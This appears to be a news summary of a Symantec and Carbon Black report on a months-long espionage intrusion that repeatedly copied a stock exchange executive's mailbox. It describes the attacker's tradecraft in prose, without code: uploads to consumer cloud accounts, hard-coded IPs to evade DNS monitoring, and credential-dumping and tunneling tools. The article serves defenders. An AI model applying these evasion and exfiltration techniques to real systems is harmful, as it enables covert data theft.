"By the time defenders noticed anything, the intruder had full control of the machine," Symantec and Carbon Black's Threat Hunter Team reported — and that control dated back to at least October 10, 2025, when two binaries were already running as SYSTEM on a senior stock exchange executive's computer.
October 10, 2025: SYSTEM-level foothold and unknown initial access
Symantec and Carbon Black's Threat Hunter Team say the first malicious activity appeared on October 10, 2025. By then the attacker was running two binaries as SYSTEM, the highest Windows privilege level: one masquerading as Adobe's updater and another pretending to be OneDrive. How the intruder first gained access remains unknown; Symantec confirmed that the earliest signs likely came from lateral movement off a previously compromised device rather than a directly observed exploit.
Mailbox stealer built on Aspose and a steady, low-noise pull schedule
The principal tool the intruder deployed was a mailbox stealer wrapped around Aspose, a legitimate .NET library that reads Outlook OST and PST files. Converted into an executable, the tool exported the executive's mailbox to PST on disk, run each time with a password and a date-range flag. The initial run pulled messages dating back to August 2025; after that the attacker returned every two to four weeks, taking only the new mail since the last pull. Symantec observed eight additional pulls through February 17, 2026, producing a near-continuous copy of the inbox sliced thin enough to avoid detection.
Exfiltration through consumer cloud services — Dropbox, OneDrive, and a brief test of temp.sh
To hide its traffic, the operation routed data through consumer cloud services. On November 12 the attacker grabbed a Dropbox API token and began uploading with curl, using both Dropbox and OneDrive Personal accounts for exfiltration. For OneDrive traffic the attacker connected to hard-coded Microsoft IP addresses rather than the onedrive.live.com hostname so perimeter tools would not see DNS lookups that could flag the activity. The intruder briefly tested the public file host temp.sh in November but then dropped it. The last observed activity was on March 19, 2026, when a new backdoor was staged but never executed — which Elias said may mean the attacker lost access soon after.
Wider intrusion kit observed: tunneling, credential dumps, and UAC bypass
Symantec's indicators point to a broader toolkit beyond the mailbox grabber. Observed components include FRPC for tunneling traffic out, Secretsdump for extracting Windows credentials, SharpDecryptPwd for recovering saved application passwords, and a tool to bypass Windows User Account Control. The report does not specify how each piece was used in this intrusion, and none of these tools tie the operation to a named threat actor.
What this means for exchanges, regulators, and security teams
- Exchanges and senior executives: An executive inbox can contain non-public listing details, enforcement matters, deal terms, market-moving plans, calendars and contacts — making a single mailbox a high-value target. Five months of quiet access can provide a detailed read on an organization's plans without needing broad access to other systems.
- Regulators and oversight bodies: This was an espionage-style operation rather than a theft-for-profit incident; Symantec said the commands indicate intelligence collection. There is no CVE in play — no patch would have prevented this — shifting the burden toward monitoring privileged accounts and outbound telemetry.
- Security teams and incident responders: The tactic of blending exfiltration into normal cloud activity — using Dropbox and OneDrive and hard-coded IPs to avoid DNS logs — underscores the need to watch for behavior, not just signatures. Symantec recommends feeding the reported hashes into detection tooling and watching for unusual mailbox export activity, odd Outlook access, uploads to personal cloud accounts, unexpected tunneling, and credential-dumping on systems tied to privileged users.
The campaign shows how an attacker can harvest high-value email quietly and persistently by combining a mailbox conversion tool, consumer cloud storage, and common public utilities. Attribution remains unresolved: the mix of public tooling and consumer services left little to tie the activity to a known group, a gap the researchers left open until stronger evidence appears. For organizations that sit on market-moving information, the takeaway is stark and specific — monitor the behaviors Symantec and Carbon Black have detailed, and feed their indicators into detection and response pipelines now.
